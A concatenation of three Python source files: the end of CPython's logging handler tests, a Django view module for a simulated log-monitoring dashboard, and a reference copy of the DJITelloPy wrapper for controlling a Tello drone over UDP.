rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
h = logging.handlers.NTEventLogHandler('test_logging')
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertTrue(num_recs < win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, HandlerTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, DatagramHandlerTest,
MemoryTest, EncodingTest, WarningsTest, ConfigDictTest,
ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest,
BasicConfigTest, LoggerAdapterTest, LoggerTest,
SMTPHandlerTest, FileHandlerTest, RotatingFileHandlerTest,
LastResortTest, LogRecordTest, ExceptionTest,
SysLogHandlerTest, HTTPHandlerTest, NTEventLogHandlerTest,
TimedRotatingFileHandlerTest
)
if __name__ == "__main__":
test_main()
|
views.py
|
from threading import Thread
import pandas
import matplotlib.pyplot as plt
import shutil
import os
import subprocess
import time
from django.template import loader
import signal
from django.http import HttpResponse
from django.shortcuts import render, redirect
import re
threads=[]
stop=False
proc1 = None
live_flag=0
live_n=None
live_p=None
live_number_of_lines=None
live_pattern=None
req = None
n_global=None
p_global=None
running_status=0
def IndexView(request):
global stop
global threads
global live_flag
global live_n
global live_p
global live_number_of_lines
global live_pattern
global req
global n_global
global proc1
global p_global
global running_status
variable=0
variable2=0
data=""
live_flag=0
if live_flag ==1:
if ("Live_Stop" in request.POST):
live_flag = 0
template = loader.get_template('index.html')
context = {'variable': variable, 'data': data, 'variable2': variable2,
}
return HttpResponse(template.render(context, request))
data2=[]
list=[]
time.sleep(1)
live(live_n, live_p, live_number_of_lines, "a")
print("Harsh Hi")
variable = 0
variable2 = 1
for i in range(live_n):
f = open("/anode%d" % (i + 1), "r")
list.append(i)
data = f.read()
data2.append((data, i))
print(data2)
print(len(data2))
template = loader.get_template('index.html')
context = {'variable': variable, 'data': data, 'data2': data2, 'variable2': variable2, 'list': list,
}
return HttpResponse(template.render(context, request))
else:
if request.method == "POST":
print(request)
if request.POST["value_n"] :
value_n = request.POST["value_n"]
if value_n != "":
value_n = int(value_n)
n_global=value_n
print(value_n)
if request.POST["value_p"]:
value_p = request.POST["value_p"]
if value_p != "":
value_p = int(value_p)
p_global=value_p
print(value_p)
if ("Start" in request.POST) :
process = Thread(target=run_script, args=[value_n, value_p])
process.start()
threads.append(process)
print(threads)
running_status=1
if ("Stop" in request.POST) and (live_flag != 1):
while(os.path.isdir('log_simulator')):
os.system('rm -rf log_simulator')
print("####################STOPPED#######################")
stop = False
for process in threads:
process.join()
running_status=0
if ("Print" in request.POST):
n_val = int(request.POST["n"])
p_val = int(request.POST["p"])
pattern = request.POST["pattern"]
number_lines = int(request.POST["number_of_lines"])
headTen(n_val, p_val, number_lines, pattern, "/home/harsh/PycharmProjects/CloudInit/log.txt")
f = open("log.txt", "r")
data = f.read()
variable = 1
data2 = []
list = []
template = loader.get_template('index.html')
context = {'variable': variable, 'data': data, 'data2': data2, 'variable2': variable2, 'list': list, 'running_status':running_status,
}
return HttpResponse(template.render(context, request))
else:
template = loader.get_template('index.html')
context = {'variable': variable, 'data': data, 'variable2': variable2, 'running_status':running_status,
}
return HttpResponse(template.render(context, request))
def LiveView(request):
global live_flag
global live_n
global live_p
global live_number_of_lines
global live_pattern
global n_global
variable2=0
if live_flag ==1:
if ("Live_Stop" in request.POST):
live_flag = 0
template = loader.get_template('live.html')
context = {'variable2': variable2,
}
return HttpResponse(template.render(context, request))
data2=[]
list=[]
time.sleep(1)
live(live_n, live_p, live_number_of_lines, "a")
variable2 = 1
for i in range(live_n):
df = pandas.read_csv("anode%d.csv"%(i+1), sep=',')
data = df.to_html()
list.append(i)
data2.append((data, i))
template = loader.get_template('live.html')
context = {'data2': data2, 'variable2': variable2, 'list': list,
}
return HttpResponse(template.render(context, request))
else:
if request.method == "POST":
data2 = []
list = []
if ("Print_live" in request.POST):
live_n = n_global
live_p = int(request.POST["p_live"])
live_number_of_lines = int(request.POST["live_number_of_lines"])
live_flag = 1
if live_flag == 1:
time.sleep(1)
live(live_n, live_p, live_number_of_lines, "a")
variable = 0
variable2 = 1
for i in range(live_n):
df = pandas.read_csv("anode%d.csv" % (i + 1), sep=',')
data = df.to_html()
list.append(i)
data2.append((data, i))
template = loader.get_template('live.html')
context = { 'data2': data2, 'variable2': variable2, 'list': list,
}
return HttpResponse(template.render(context, request))
template = loader.get_template('live.html')
context = { 'data2': data2, 'variable2': variable2, 'list': list,
}
return HttpResponse(template.render(context, request))
else:
template = loader.get_template('live.html')
context = {'variable2': variable2,
}
return HttpResponse(template.render(context, request))
def TimeView(request):
variable3 = 0
data_time = ""
global n_global
print(request.POST)
if (request.method == "POST"):
n_time = int(request.POST['n_time'])
p_time = int(request.POST['p_time'])
start = request.POST['date_start']
end = request.POST['date_end']
live(n_global,p_time,1000,"a")
TimeData(n_time, p_time, start, end)
df = pandas.read_csv("time.csv", sep=',')
data_time = df.to_html()
variable3 = 1
template = loader.get_template('time.html')
context = {'variable3': variable3, 'data_time': data_time,
}
return HttpResponse(template.render(context, request))
else:
template = loader.get_template('time.html')
context = {'variable3': variable3, 'data_time': data_time,
}
return HttpResponse(template.render(context, request))
def TimelineView(request):
global n_global
global p_global
variable=0
data_timeline =[]
if(request.method == 'POST'):
number_of_lines = int(request.POST['number_of_lines'])
timeline(n_global,p_global,number_of_lines)
df = pandas.read_csv("timeline.csv", sep=',')
data_timeline = df.to_html()
variable=1
print(data_timeline)
template = loader.get_template('timeline.html')
context = {'variable':variable, 'data_timeline':data_timeline}
return HttpResponse(template.render(context,request))
else:
variable=0
data_timeline=[]
template = loader.get_template('timeline.html')
context = {'variable':variable, 'data_timeline':data_timeline}
return HttpResponse(template.render(context,request))
def GraphView(request):
variable=0
global n_global
if (request.method == "POST"):
variable=1
n_graph = n_global
p_graph = int(request.POST['p_graph'])
num_graph = int(request.POST['num_graph'])
search = request.POST['search']
process_counts(n_graph, p_graph, num_graph, search)
list=[]
data=[]
for i in range(n_graph):
list.append((i,i+1))
data.append(("plotNode_%d.png"%(i+1),"plotNode_pie_%d.png"%(i+1),i))
print(data)
print(list)
template = loader.get_template('graph.html')
context = {'variable': variable,
'list':list,
'data':data
}
return HttpResponse(template.render(context, request))
else:
template = loader.get_template('graph.html')
context = {'variable': variable,
}
return HttpResponse(template.render(context, request))
def timeline(n,p,num):
file_path2="log_simulator/"
i=1
while i<=n:
j=1
while j<=p:
filename=file_path2+'HackNode'+str(i)+"/Process"+str(j)+".log"
lines="".join(tail(filename,num)).split('\n')
FR=open("timeline.csv","w")
FR.write("Date,Time,Node,Process,Tag,File,Exception"+"\n")
FR.close()
FR=open("timeline.csv","a+")
for line in lines :
l=line.split()
# if line.find(keyword):
# print(line)
if (re.match("^\d",line)!=None):
# print(l)
FR.write(l[0] + " , "+str(l[1])+ " , " + str(i)+ " , " +str(j) + " , "+l[2]+" , "+l[3]+" , "+" ".join(l[4:])+"\n")
print(str(l[0]) + "| "+str(l[1])+ "| NODE :" + str(i)+ "| PROCESS :" +str(j) + "| MATCH LINE:"+str(" ".join(l[2:]))+"\n")
j+=1
FR.close()
i+=1
def process_counts(n, process, num, extra):
i = 1
extra = extra.split(',')
file_path1='log_simulator/'
while i <= n:
filename = file_path1 + 'HackNode' + str(i) + "/Process" + str(process) + ".log"
count_info = 0
count_dbg = 0
count_error = 0
string = "".join(tail(filename, num))
extra_y = [0] * len(extra)
for line in string.split('\n'):
print(line)
if line.find('DBG') >= 0:
count_dbg += 1
elif line.find('ERROR') >= 0:
count_error += 1
elif line.find('INFO') >= 0:
count_info += 1
for j in range(0, len(extra)):
if re.search(extra[j], line, re.I):
extra_y[j] += 1
x = ["INFO", "DBG", "ERROR"] + extra
y = [count_info, count_dbg, count_error] + extra_y
barplot(x, y, i, num)
i += 1
def barplot(x, y, i, num):
# my_color=tuple([round(i/(len(x)+1),1) for i in range(1,len(x)+1)])
# print(my_color)
plt.bar(x, y)
plt.xlabel('Category')
plt.ylabel('Number of occurrence in last ' + str(num) + ' logs in node ' + str(i))
plt.savefig('media/plotNode_' + str(i))
plt.close()
plt.pie(y, labels=x)
plt.savefig('media/plotNode_pie_' + str(i))
plt.close()
def run_script(n,p):
global proc1
proc1 = subprocess.Popen("python2 log_simulator.zip -n %d -p %d" %(n,p), shell=True)
def headTen(node, process, num, pattern, outputfilename):
filename = 'log_simulator/HackNode' + str(node) + "/Process" + str(process) + ".log"
FO = open(filename, 'r')
FR = open(outputfilename, 'w')
count = 0
while True and count < num:
loglines = FO.readline()
if loglines.find(pattern) >= 0:
# print(loglines)
# loglines = loglines +"<br>"
FR.write(loglines)
count += 1
# def live(n,process,num,pattern,outputfilename):
# file_path1 = '/home/harsh/PycharmProjects/CloudInit/log_simulator/'
# delay=0
# time.sleep(delay)
# i=1
# while i <= n:
# filename=file_path1+'HackNode'+str(i)+"/Process"+str(process)+".log"
# FR=open(outputfilename+"node"+str(i),'w')
# to_print = "".join(tail(filename,num))
# if re.search(pattern, to_print, re.I):
# FR.write(to_print)
# print(to_print)
# FR.close()
# i+=1
# def live(n, process, num, outputfilename):
# file_path1 = '/home/harsh/PycharmProjects/CloudInit/log_simulator/'
# delay = 0.1
# time.sleep(delay)
# i = 1
# while i <= n:
# filename = file_path1 + 'HackNode' + str(i) + "/Process" + str(process) + ".log"
# FR = open(outputfilename + "node" + str(i)+".csv", 'w')
# FR.write("Date,Timestamp,Tags,File,Exception" + "\n")
# FR.close()
# FR = open(outputfilename + "node" + str(i)+".csv", 'a+')
# to_print = "".join(tail(filename, num))
# to_print = to_print.split("\n")
# count = 0
# flag = 0
# for x in to_print:
# count += 1
# if ((re.match("^\d", x) == None)):
# if (x.split(" ")[0] == "Traceback"):
# flag = 4
#
# print(x)
# flag -= 1
# else:
# if (count > num):
# continue
# t = x.split(" ")
# a = " ".join(t[4:])
# b = ",".join(t[0:4])
# toprint = b + "," + a
# if (count != num):
# FR.write(toprint + "\n")
# # print(toprint)
# else:
# FR.write(toprint)
# # print(toprint)
#
# # to_print[5]= " ".join(to_print[5:])
# # to_print = ",".join(to_print[0:5])
# # print(to_print)
# print("\n")
# # if re.search(pattern, to_print, re.I):
# # FR.write(to_print)
# # print(to_print)
# FR.close()
# # with open(outputfilename+"node"+str(i),'r') as infile, open(outputfilename+"node_"+str(i), 'a+') as outfile:
# # for line in infile:
# # outfile.write(" ".join(line.split()).replace(' ', ','))
# # outfile.write(",")
# i += 1
def live(n, process, num, outputfilename):
file_path1 = 'log_simulator/'
delay = 0.01
time.sleep(delay)
i = 1
while i <= n:
filename = file_path1 + 'HackNode' + str(i) + "/Process" + str(process) + ".log"
FR = open(outputfilename + "node" + str(i) + '.csv', 'w')
FR.write("Date,Timestamp,Tags,File,Exception" + "\n")
FR.close()
FR = open(outputfilename + "node" + str(i) + '.csv', 'a+')
to_print = "".join(tail(filename, num))
to_print = to_print.split("\n")
count = 0
for x in to_print:
count += 1
if ((re.match("^\d", x) == None)):
if (re.match("^\s", x) != None):
y = x.split(",")
print(" - , - ," + y[0] + "," + y[1] + ", Traceback" + y[2])
FR.write(" - , - ," + y[0] + "," + y[1] + ", Traceback" + y[2] +"\n")
# print("-,-,"+x)
elif (x.split(" ")[0] == "Traceback"):
continue
else:
y = x.split(":")
if (len(y) > 1):
FR.write(" - , - , " + y[0] + " , - ," + y[1] + "\n")
print(" - , - , " + y[0] + " , - ," + y[1])
else:
if (count > num):
continue
t = x.split(" ")
a = " ".join(t[4:])
b = ",".join(t[0:4])
toprint = b + "," + a
if (count != num):
FR.write(toprint + "\n")
print(toprint)
else:
FR.write(toprint)
print(toprint)
# to_print[5]= " ".join(to_print[5:])
# to_print = ",".join(to_print[0:5])
# print(to_print)
print("\n")
# if re.search(pattern, to_print, re.I):
# FR.write(to_print)
# print(to_print)
FR.close()
# with open(outputfilename+"node"+str(i),'r') as infile, open(outputfilename+"node_"+str(i), 'a+') as outfile:
# for line in infile:
# outfile.write(" ".join(line.split()).replace(' ', ','))
# outfile.write(",")
i += 1
def tail(fi, n):
f = open(fi, 'r')
assert n >= 0
pos, lines = n + 1, []
while len(lines) <= n:
try:
f.seek(-pos, 2)
except IOError:
f.seek(0)
break
finally:
lines = list(f)
pos *= 2
return lines[-n:]
def TimeData(n,p,start,end):
startDate=start
endDate=end
print(startDate)
print(endDate)
date_re = re.compile(r'(\d+-\d+-\d+\,\d+:\d+:\d+)')
with open("anode%d.csv"%(n), "r") as fh:
FR = open("time.csv", "w")
FR.write("Date,Timestamp,Tag,File,Exception" + "\n")
FR.close()
for line in fh.readlines():
match = date_re.search(line)
if match is not None:
matchDate = match.group(1)
if matchDate >= startDate and matchDate <= endDate:
FR = open("time.csv", 'a+')
t = line.split(",")
FR.write(line)
|
djitellopy.py
|
#
# Code from https://github.com/damiafuentes/DJITelloPy. Please install from that original github. This here is only for reference.
#
# coding=utf-8
import logging
import socket
import time
import threading
import cv2
from threading import Thread
from .decorators import accepts
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf
"""
# Send and receive commands, client socket
UDP_IP = '192.168.10.1'
UDP_PORT = 8889
RESPONSE_TIMEOUT = 7 # in seconds
TIME_BTW_COMMANDS = 1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.5 # in seconds
RETRY_COUNT = 3
last_received_command = time.time()
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('%(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# use logging.getLogger('djitellopy').setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
STATE_UDP_PORT = 8890
# VideoCapture object
cap = None
background_frame_read = None
stream_on = False
is_flying = False
# Tello state
pitch = -1
roll = -1
yaw = -1
speed_x = -1
speed_y = -1
speed_z = -1
temperature_lowest = -1
temperature_highest = -1
distance_tof = -1
height = -1
battery = -1
barometer = -1.0
flight_time = -1.0
acceleration_x = -1.0
acceleration_y = -1.0
acceleration_z = -1.0
attitude = {'pitch': -1, 'roll': -1, 'yaw': -1}
def __init__(self,
host='192.168.10.1',
port=8889,
client_socket=None,
enable_exceptions=True,
retry_count=3):
self.address = (host, port)
self.response = None
self.response_state = None # to attain the response of the states
self.stream_on = False
self.enable_exceptions = enable_exceptions
self.retry_count = retry_count
if client_socket:
self.clientSocket = client_socket
else:
self.clientSocket = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
self.clientSocket.bind(('', self.UDP_PORT)) # For UDP response (receiving data)
self.stateSocket = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)
self.stateSocket.bind(('', self.STATE_UDP_PORT)) # for accessing the states of Tello
# Run tello udp receiver on background
thread1 = threading.Thread(target=self.run_udp_receiver, args=())
# Run state reciever on background
thread2 = threading.Thread(target=self.get_states, args=())
thread1.daemon = True
thread2.daemon = True
thread1.start()
thread2.start()
def run_udp_receiver(self):
"""Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread
in order to not block the main thread."""
while True:
try:
self.response, _ = self.clientSocket.recvfrom(1024) # buffer size is 1024 bytes
except Exception as e:
self.LOGGER.error(e)
break
def get_states(self):
"""This runs on background to recieve the state of Tello"""
while True:
try:
self.response_state, _ = self.stateSocket.recvfrom(256)
if self.response_state != 'ok':
self.response_state = self.response_state.decode('ASCII')
list = self.response_state.replace(';', ':').split(':')
self.pitch = int(list[1])
self.roll = int(list[3])
self.yaw = int(list[5])
self.speed_x = int(list[7])
self.speed_y = int(list[9])
self.speed_z = int(list[11])
self.temperature_lowest = int(list[13])
self.temperature_highest = int(list[15])
self.distance_tof = int(list[17])
self.height = int(list[19])
self.battery = int(list[21])
self.barometer = float(list[23])
self.flight_time = float(list[25])
self.acceleration_x = float(list[27])
self.acceleration_y = float(list[29])
self.acceleration_z = float(list[31])
self.attitude = {'pitch': int(list[1]), 'roll': int(list[3]), 'yaw': int(list[5])}
except Exception as e:
self.LOGGER.error(e)
self.LOGGER.error(f"Response was is {self.response_state}")
break
def get_udp_video_address(self):
return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT) # + '?overrun_nonfatal=1&fifo_size=5000'
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self):
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
self.background_frame_read = BackgroundFrameRead(self, self.get_udp_video_address()).start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
@accepts(command=str, printinfo=bool, timeout=int)
def send_command_with_return(self, command, printinfo=True, timeout=RESPONSE_TIMEOUT):
"""Send command to Tello and wait for its response.
Return:
bool: True for successful, False for unsuccessful
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() * 1000 - self.last_received_command
if diff < self.TIME_BTW_COMMANDS:
time.sleep(diff)
if printinfo:
self.LOGGER.info('Send command: ' + command)
timestamp = int(time.time() * 1000)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > timeout * 1000:
self.LOGGER.warning('Timeout exceed on command ' + command)
return False
try:
response = self.response.decode('utf-8').rstrip("\r\n")
except UnicodeDecodeError as e:
self.LOGGER.error(e)
return None
if printinfo:
self.LOGGER.info(f'Response {command}: {response}')
self.response = None
self.last_received_command = time.time() * 1000
return response
@accepts(command=str)
def send_command_without_return(self, command):
"""Send command to Tello without expecting a response. Use this method when you want to send a command
continuously
- go x y z speed: Tello fly to x y z in speed (cm/s)
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
- curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with
speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responses false.
x/y/z can’t be between -20 – 20 at the same time .
x1, x2: 20-500
y1, y2: 20-500
z1, z2: 20-500
speed: 10-60
- rc a b c d: Send RC control via four channels.
a: left/right (-100~100)
b: forward/backward (-100~100)
c: up/down (-100~100)
d: yaw (-100~100)
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
self.LOGGER.info('Send command (no expect response): ' + command)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
@accepts(command=str, timeout=int)
def send_control_command(self, command, timeout=RESPONSE_TIMEOUT):
"""Send control command to Tello and wait for its response. Possible control commands:
- command: entry SDK mode
- takeoff: Tello auto takeoff
- land: Tello auto land
- streamon: Set video stream on
- streamoff: Set video stream off
- emergency: Stop all motors immediately
- up x: Tello fly up with distance x cm. x: 20-500
- down x: Tello fly down with distance x cm. x: 20-500
- left x: Tello fly left with distance x cm. x: 20-500
- right x: Tello fly right with distance x cm. x: 20-500
- forward x: Tello fly forward with distance x cm. x: 20-500
- back x: Tello fly back with distance x cm. x: 20-500
- cw x: Tello rotate x degree clockwise x: 1-3600
- ccw x: Tello rotate x degree counter- clockwise. x: 1-3600
- flip x: Tello fly flip x
l (left)
r (right)
f (forward)
b (back)
- speed x: set speed to x cm/s. x: 10-100
- wifi ssid pass: Set Wi-Fi with SSID password
Return:
bool: True for successful, False for unsuccessful
"""
response = None
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if response == 'OK' or response == 'ok':
return True
return self.return_error_on_send_command(command, response, self.enable_exceptions)
@accepts(command=str, printinfo=bool)
def send_read_command(self, command, printinfo=True):
"""Send set command to Tello and wait for its response. Possible set commands:
- speed?: get current speed (cm/s): x: 1-100
- battery?: get current battery percentage: x: 0-100
- time?: get current fly time (s): time
- height?: get height (cm): x: 0-3000
- temp?: get temperature (°C): x: 0-90
- attitude?: get IMU attitude data: pitch roll yaw
- baro?: get barometer value (m): x
- tof?: get distance value from TOF (cm): x: 30-1000
- wifi?: get Wi-Fi SNR: snr
Return:
bool: The requested value for successful, False for unsuccessful
"""
response = self.send_command_with_return(command, printinfo=printinfo)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
if response.isdigit():
return int(response)
else:
try:
return float(response) # isdigit() is False when the number is a float(barometer)
except ValueError:
return response
else:
return self.return_error_on_send_command(command, response, self.enable_exceptions)
def return_error_on_send_command(self, command, response, enable_exceptions):
"""Returns False and print an informative result code to show unsuccessful response"""
msg = 'Command ' + command + ' was unsuccessful. Message: ' + str(response)
if enable_exceptions:
raise Exception(msg)
else:
self.LOGGER.error(msg)
return False
def connect(self):
"""Entry SDK mode
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("command")
def takeoff(self):
"""Tello auto takeoff
Returns:
bool: True for successful, False for unsuccessful
False: Unsuccessful
"""
# Something it takes a looooot of time to take off and return a succesful take off. So we better wait. If not, is going to give us error on the following calls.
if self.send_control_command("takeoff", timeout=20):
self.is_flying = True
return True
else:
return False
def land(self):
"""Tello auto land
Returns:
bool: True for successful, False for unsuccessful
"""
if self.send_control_command("land"):
self.is_flying = False
return True
else:
return False
def streamon(self):
"""Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That
can be done through the Tello app.
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamon")
if result is True:
self.stream_on = True
return result
def streamoff(self):
"""Set video stream off
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamoff")
if result is True:
self.stream_on = False
return result
def emergency(self):
"""Stop all motors immediately
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("emergency")
@accepts(direction=str, x=int)
def move(self, direction, x):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(direction + ' ' + str(x))
@accepts(x=int)
def move_up(self, x):
"""Tello fly up with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("up", x)
@accepts(x=int)
def move_down(self, x):
"""Tello fly down with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("down", x)
@accepts(x=int)
def move_left(self, x):
"""Tello fly left with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("left", x)
@accepts(x=int)
def move_right(self, x):
"""Tello fly right with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("right", x)
@accepts(x=int)
def move_forward(self, x):
"""Tello fly forward with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("forward", x)
@accepts(x=int)
def move_back(self, x):
"""Tello fly back with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("back", x)
@accepts(x=int)
def rotate_clockwise(self, x):
"""Tello rotate x degree clockwise.
Arguments:
x: 1-360
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("cw " + str(x))
@accepts(x=int)
def rotate_counter_clockwise(self, x):
"""Tello rotate x degree counter-clockwise.
Arguments:
x: 1-3600
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("ccw " + str(x))
@accepts(x=str)
def flip(self, direction):
"""Tello fly flip.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
Returns:
